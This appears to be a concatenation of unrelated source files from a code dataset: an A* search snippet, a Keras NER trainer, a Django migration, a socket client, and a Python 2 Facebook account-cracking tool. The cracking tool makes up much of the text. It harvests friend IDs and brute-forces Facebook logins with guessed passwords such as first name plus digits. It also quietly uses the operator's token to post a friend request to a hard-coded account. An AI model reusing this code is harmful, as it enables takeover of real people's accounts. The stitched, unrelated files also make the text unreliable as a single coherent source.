self.queue.extend(items)
def pop(self):
if len(self.queue) > 0:
return self.queue.pop(self.pop_index)
else:
raise Exception('FIFOQueue is empty')
    def printQueue(self):
        # debug helper: the original body was missing, which made the class a
        # syntax error; print the current frontier contents
        print(self.queue)
    def __len__(self):
        return len(self.queue)
def __contains__(self, item):
return item in self.queue
def best_first_search(problem, f, pop_index=0):
node = Node(problem.initial)
if problem.goal_test(node.state):
        return node
frontier = Queue(pop_index)
frontier.sortAppend(node, f)
explored = set()
while frontier:
frontier.printQueue()
node = frontier.pop()
if problem.goal_test(node.state):
return node
explored.add(node.state)
for child in node.expand(problem):
if child.state not in explored and child not in frontier:
frontier.sortAppend(child, f)
return None
def a_star(problem):
return best_first_search(problem, lambda node: node.path_cost + heuristic[node.state])
def gbfs(problem):
return best_first_search(problem, lambda node: heuristic[node.state])
graph_problem = graphProblem("S", "G", graph)
print("--------------GBFS--------------")
goalnode = gbfs(graph_problem)
print(goalnode.solution())
print('Path Cost: ', goalnode.path_cost, "\n")
print("--------------A*--------------")
goalnode = a_star(graph_problem)
print(goalnode.solution())
print('Path Cost: ', goalnode.path_cost)
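
# Expected output for the graph above, traced by hand: GBFS pops G straight
# from S's successors (h(G) = 0) and returns ['G'] with path cost 9. A*
# returns ['A', 'C', 'G'] with path cost 8 rather than the cheapest route
# S-B-D-G (cost 7): once D has been explored via A (g = 5), the cheaper path
# to D through B (g = 3) is discarded, because this implementation never
# reopens explored states.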
| [
"[email protected]"
] | |
ebd9d906222fd020229e5ca693eed78aaf12a12e | 31134588835ee5e3e0a20fea8797789a5c74fe33 | /Tamoo | 518e8c3856f6d7dd35603320fd552101e3c5d1bf | [] | no_license | tamoo320/ally | dc16815cd5bc4b26dd49e83c24bf01521b832848 | 8a92bf7bbfe1041185c92a4b44483aa24b7737f5 | refs/heads/master | 2022-06-30T18:35:40.478192 | 2020-05-12T15:47:34 | 2020-05-12T15:47:34 | 263,379,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,710 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•THE - Tamoo -OFFICAL------•◈•
|__\~~) •||•Khan- Pathan---------------•◈•
|__(-----\ •◈•------AFTHZ-Owner-----•◈•
|__~~~\ •◈•-----█-------4-------█------•◈•
|__~~~\ •◈•-----█-------2-------█------•◈•
|__~~~\ •◈•-----█-------0-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;FlowRana
\033[1;96mFacebook \033[1;93m: \033[1; Aahilrna4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
Open = []
check = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mAbdullah
\033[1;96mInstagram \033[1;93m: \033[1;92mPathan
\033[1;96mFacebook \033[1;93m: \033[1;92m Abdullah
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/tamoo302/ally
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "ally"
CorrectPassword = "ally"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"[email protected]"
] | ||
2072ae91d99cd4b79f0e44d24a9b507f95cc2c02 | f5772055d0d876271c1725b22bf72bf7ee8b023f | /ner/hash-2-pos-chunk-128-64.py | 9a5a7e42c73ba9b892d942f61600770f14abf000 | [
"MIT"
] | permissive | danche354/Sequence-Labeling | 175d01d82d0909d83d9f74507a897fb7c663ab66 | 1af1fbbacf2db4f969b6046d39eee24623a11cc0 | refs/heads/master | 2020-06-11T03:29:10.068740 | 2017-07-16T14:43:43 | 2017-07-16T14:43:43 | 76,015,154 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,562 | py | from keras.models import Model
from keras.layers import Input, Masking, Dense, LSTM
from keras.layers import Dropout, TimeDistributed, Bidirectional, merge
from keras.layers.embeddings import Embedding
from keras.utils import np_utils
import numpy as np
import pandas as pd
import sys
import math
import os
from datetime import datetime
# add path
sys.path.append('../')
sys.path.append('../tools')
from tools import conf
from tools import load_data
from tools import prepare
from tools import plot
np.random.seed(0)
# train hyperparameters
step_length = conf.ner_step_length
pos_length = conf.ner_pos_length
chunk_length = conf.ner_chunk_length
hash_vocab = conf.ner_hash_vocab
hash_length = conf.ner_hash_length
output_length = conf.ner_IOB_length
batch_size = conf.batch_size
nb_epoch = conf.nb_epoch
model_name = os.path.basename(__file__)[:-3]
folder_path = 'model/%s'%model_name
if not os.path.isdir(folder_path):
os.makedirs(folder_path)
# the data, shuffled and split between train and test sets
train_data = load_data.load_ner(dataset='eng.train')
dev_data = load_data.load_ner(dataset='eng.testa')
train_samples = len(train_data)
dev_samples = len(dev_data)
print('train shape:', train_samples)
print('dev shape:', dev_samples)
print()
hash_embedding = pd.read_csv('../preprocessing/ner-auto-encoder-2/auto-encoder-embeddings.txt', delimiter=' ', header=None)
hash_embedding = hash_embedding.values
hash_embedding = np.concatenate([np.zeros((1,hash_length)),hash_embedding, np.random.rand(1,hash_length)])
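# Row 0 of the padded table is all zeros for the padding index consumed by
# mask_zero=True, and the extra random row at the end stands in for
# out-of-vocabulary hashes -- hence the Embedding input_dim of hash_vocab + 2.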
hash_index_input = Input(shape=(step_length,))
encoder_embedding = Embedding(hash_vocab+2, hash_length, weights=[hash_embedding], mask_zero=True, input_length=step_length)(hash_index_input)
pos_input = Input(shape=(step_length, pos_length))
chunk_input = Input(shape=(step_length, chunk_length))
hash_pos_chunk_merge = merge([encoder_embedding, pos_input, chunk_input], mode='concat')
input_mask = Masking(mask_value=0)(hash_pos_chunk_merge)
dp_1 = Dropout(0.5)(input_mask)
hidden_1 = Bidirectional(LSTM(128, return_sequences=True))(dp_1)
hidden_2 = Bidirectional(LSTM(64, return_sequences=True))(hidden_1)
dp_2 = Dropout(0.5)(hidden_2)
output = TimeDistributed(Dense(output_length, activation='softmax'))(dp_2)
model = Model(input=[hash_index_input,pos_input,chunk_input], output=output)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
print(model.summary())
number_of_train_batches = int(math.ceil(float(train_samples)/batch_size))
number_of_dev_batches = int(math.ceil(float(dev_samples)/batch_size))
print('start train %s ...\n'%model_name)
best_accuracy = 0
best_epoch = 0
all_train_loss = []
all_dev_loss = []
all_dev_accuracy = []
log = open('%s/model_log.txt'%folder_path, 'w')
start_time = datetime.now()
print('train start at %s\n'%str(start_time))
log.write('train start at %s\n\n'%str(start_time))
for epoch in range(nb_epoch):
start = datetime.now()
print('-'*60)
print('epoch %d start at %s'%(epoch, str(start)))
log.write('-'*60+'\n')
log.write('epoch %d start at %s\n'%(epoch, str(start)))
train_loss = 0
dev_loss = 0
np.random.shuffle(train_data)
for i in range(number_of_train_batches):
train_batch = train_data[i*batch_size: (i+1)*batch_size]
embed_index, hash_index, pos, chunk, label, length, sentence = prepare.prepare_ner(batch=train_batch, gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
chunk = np.array([(np.concatenate([np_utils.to_categorical(c, chunk_length), np.zeros((step_length-length[l], chunk_length))])) for l,c in enumerate(chunk)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
train_metrics = model.train_on_batch([hash_index, pos, chunk], y)
train_loss += train_metrics[0]
all_train_loss.append(train_loss)
correct_predict = 0
all_predict = 0
for j in range(number_of_dev_batches):
dev_batch = dev_data[j*batch_size: (j+1)*batch_size]
embed_index, hash_index, pos, chunk, label, length, sentence = prepare.prepare_ner(batch=dev_batch,gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
chunk = np.array([(np.concatenate([np_utils.to_categorical(c, chunk_length), np.zeros((step_length-length[l], chunk_length))])) for l,c in enumerate(chunk)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
# for loss
dev_metrics = model.test_on_batch([hash_index, pos, chunk], y)
dev_loss += dev_metrics[0]
# for accuracy
prob = model.predict_on_batch([hash_index, pos, chunk])
for i, l in enumerate(length):
predict_label = np_utils.categorical_probas_to_classes(prob[i])
correct_predict += np.sum(predict_label[:l]==label[i][:l])
all_predict += np.sum(length)
    epoch_accuracy = float(correct_predict)/all_predict
    all_dev_accuracy.append(epoch_accuracy)
    all_dev_loss.append(dev_loss)
    if epoch_accuracy >= best_accuracy:
        best_accuracy = epoch_accuracy
        best_epoch = epoch
best_epoch = epoch
end = datetime.now()
model.save('%s/model_epoch_%d.h5'%(folder_path, epoch), overwrite=True)
print('epoch %d end at %s'%(epoch, str(end)))
print('epoch %d train loss: %f'%(epoch, train_loss))
print('epoch %d dev loss: %f'%(epoch, dev_loss))
    print('epoch %d dev accuracy: %f'%(epoch, epoch_accuracy))
print('best epoch now: %d\n'%best_epoch)
log.write('epoch %d end at %s\n'%(epoch, str(end)))
log.write('epoch %d train loss: %f\n'%(epoch, train_loss))
log.write('epoch %d dev loss: %f\n'%(epoch, dev_loss))
    log.write('epoch %d dev accuracy: %f\n'%(epoch, epoch_accuracy))
log.write('best epoch now: %d\n\n'%best_epoch)
end_time = datetime.now()
print('train end at %s\n'%str(end_time))
log.write('train end at %s\n\n'%str(end_time))
timedelta = end_time - start_time
print('train cost time: %s\n'%str(timedelta))
print('best epoch last: %d\n'%best_epoch)
log.write('train cost time: %s\n\n'%str(timedelta))
log.write('best epoch last: %d\n\n'%best_epoch)
plot.plot_loss(all_train_loss, all_dev_loss, folder_path=folder_path, title='%s'%model_name)
plot.plot_accuracy(all_dev_accuracy, folder_path=folder_path, title='%s'%model_name)
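# --- Added example (not in the original script): reload the best checkpoint ---
# --- and tag the last prepared dev batch; assumes the names bound above.    ---
from keras.models import load_model
best_model = load_model('%s/model_epoch_%d.h5'%(folder_path, best_epoch))
probs = best_model.predict_on_batch([hash_index, pos, chunk])
predicted = [np_utils.categorical_probas_to_classes(p) for p in probs]
print('sample predicted tag ids:', predicted[0][:10])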
de17d29ef0e4c7870bf659be6303286e52e36dff | eb6a65c8eaa9d430d9b30240dccbfb4f99c34115 | /server/core/migrations/0006_deposit.py | c6c140460f87e2edff97534af98ed66cb9d832d8 | [] | no_license | dopeboy/underline | 17c2658b95cada089325cf28ad23211b4622e480 | 9028c444771f0ac8bd7d0f2c7ed326d338bf80ab | refs/heads/main | 2023-06-17T15:49:49.511694 | 2021-07-14T21:48:38 | 2021-07-14T21:48:38 | 335,760,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | # Generated by Django 3.1.6 on 2021-02-25 22:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0005_slip_entry_amount'),
]
operations = [
migrations.CreateModel(
name='Deposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=6)),
('transaction_details', models.JSONField()),
('order_data', models.JSONField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
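# --- Added illustration (not part of the generated migration): a sketch of the ---
# --- core/models.py definition a migration like this would be generated from.  ---
# class Deposit(models.Model):
#     amount = models.DecimalField(max_digits=6, decimal_places=2, default=0)
#     transaction_details = models.JSONField()
#     order_data = models.JSONField()
#     user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)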
4973e698c7ce6debf75044283b024b5fb6d6c342 | 765c2f42845173a915792f66acd122d7826e4410 | /CRF/source/change_test_format.py | fae645f3564e1afac826ded98e82e37ad40124e3 | [] | no_license | ShrutiGanesh18/joint-ner-re | aa964cad43affa815bfc437ed583126632cdee99 | d8bec136c24b89b0321a415b3031b27c9d0cc96d | refs/heads/master | 2021-08-22T15:08:40.388252 | 2017-11-30T13:58:26 | 2017-11-30T13:58:26 | 112,617,288 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | f = open("test_output", "r")
g = open("evaluate_test_output", "w")
# keep token columns 0, 1, 4 and 5 of every non-blank line (likely the word,
# POS tag, gold label and predicted label in the CRF output), and preserve
# blank lines as sentence separators
for line in f:
    if line == "\n":
        g.write("\n")
    else:
        args = line.split()
        g.write(args[0] + " " + args[1] + " " + args[4] + " " + args[5] + "\n")
f.close()
g.close()
4857276be5e2c578f37cec04bf6cd1501343a4b6 | 9c33dafed8efa674448c56ae271d38b86ee936c4 | /final review demo/communication.py | 871b28f1e081c04cf5862ead750f40e2b379bc7f | [] | no_license | ARC-syn/UP-2 | ab98d20fe4ba99d07452d0b8d7de2b79120fe0b5 | 70aa718865f0cb5b228c80d0fb76cb9cc99d6b76 | refs/heads/main | 2023-05-04T12:35:01.550207 | 2021-05-25T19:03:23 | 2021-05-25T19:03:23 | 340,664,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,907 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 25 23:39:57 2021
@author: MrSan
"""
import socket
import struct
class comm:
def __init__(self):
self.ClientSocket = socket.socket()
host = '127.0.0.1'
port = 1233
print('Waiting for connection')
try:
self.ClientSocket.connect((host, port))
except socket.error as e:
print(str(e))
print('connected')
def getTarget(self):
#------------send request to server as zero---------------------------
req = 0
req = req.to_bytes(2, 'big')
self.ClientSocket.send(req)
        #-----------receive latitude and longitude as response------------------
        lat = self.ClientSocket.recv(4)    #receive latitude
        [lat] = struct.unpack('f', lat)    #convert response from bytes to float
        self.lat = lat
        print(lat)
        lon = self.ClientSocket.recv(4)    #receive longitude
        [lon] = struct.unpack('f', lon)    #convert longitude from bytes to float
        self.lon = lon
        print(lon)
def sendTarget(self, lat, lon):
#------------------send request as one--------------------------------
req = 1
req = req.to_bytes(2, 'big')
self.ClientSocket.send(req)
        #---------------------send target coordinates---------------------------
        lat = bytearray(struct.pack("f", lat))    #pack latitude float as 4 bytes
        self.ClientSocket.send(lat)               #send latitude bytes
        lon = bytearray(struct.pack("f", lon))    #pack longitude float as 4 bytes
        self.ClientSocket.send(lon)               #send longitude bytes
new = comm()
new.sendTarget(2.345, 5.678)
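# --- Added illustration (not in the original file): a minimal matching server ---
# --- loop, inferred from the 2-byte request codes and 4-byte float payloads.  ---
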